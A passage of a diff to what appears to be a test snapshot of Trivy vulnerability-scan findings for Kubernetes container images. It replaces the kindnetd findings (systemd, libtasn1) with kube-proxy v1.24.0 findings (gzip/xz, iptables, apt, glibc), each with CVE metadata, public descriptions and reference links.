"http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20386", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", - ], - }, - "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "iptables", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], "severity": "LOW", @@ -145689,314 +147278,286 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31437", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "libapt-pkg6.0", "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31437", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31438", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31438", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31439", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31439", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "4.13-3+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46848", - "installedVersion": "4.13-3", - "packageName": "libtasn1-6", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0343", - "https://access.redhat.com/security/cve/CVE-2021-46848", - "https://bugs.gentoo.org/866237", - "https://bugzilla.redhat.com/2140058", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - "https://errata.almalinux.org/9/ALSA-2023-0343.html", - "https://errata.rockylinux.org/RLSA-2023:0343", - "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", - "https://gitlab.com/gnutls/libtasn1/-/issues/32", - "https://linux.oracle.com/cve/CVE-2021-46848.html", - "https://linux.oracle.com/errata/ELSA-2023-0343.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", - "https://security.netapp.com/advisory/ntap-20221118-0006/", - "https://ubuntu.com/security/notices/USN-5707-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46848", - ], - }, - "category": "Vulnerability", - "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libtasn1: Out-of-bound access in ETYPE_OK", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46848", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0343", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46848", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://bugs.gentoo.org/866237", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140058", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0343", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", + ], + }, + "category": "Vulnerability", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5707-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-1000654", - "installedVersion": "4.13-3", - "packageName": "libtasn1-6", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", - "http://www.securityfocus.com/bid/105151", - "https://access.redhat.com/security/cve/CVE-2018-1000654", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", - "https://gitlab.com/gnutls/libtasn1/issues/4", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", - "https://ubuntu.com/security/notices/USN-5352-1", - "https://www.cve.org/CVERecord?id=CVE-2018-1000654", + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "libtasn1: Infinite loop in _asn1_expand_object_id(ptree) leads to memory exhaustion", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-1000654", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/105151", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-1000654", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/issues/4", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5352-1", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-1000654", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], "severity": "LOW", @@ -146004,753 +147565,828 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3843", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "http://www.securityfocus.com/bid/108116", - "https://access.redhat.com/security/cve/CVE-2019-3843", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", - "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", - "https://linux.oracle.com/cve/CVE-2019-3843.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3843", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108116", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3843", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 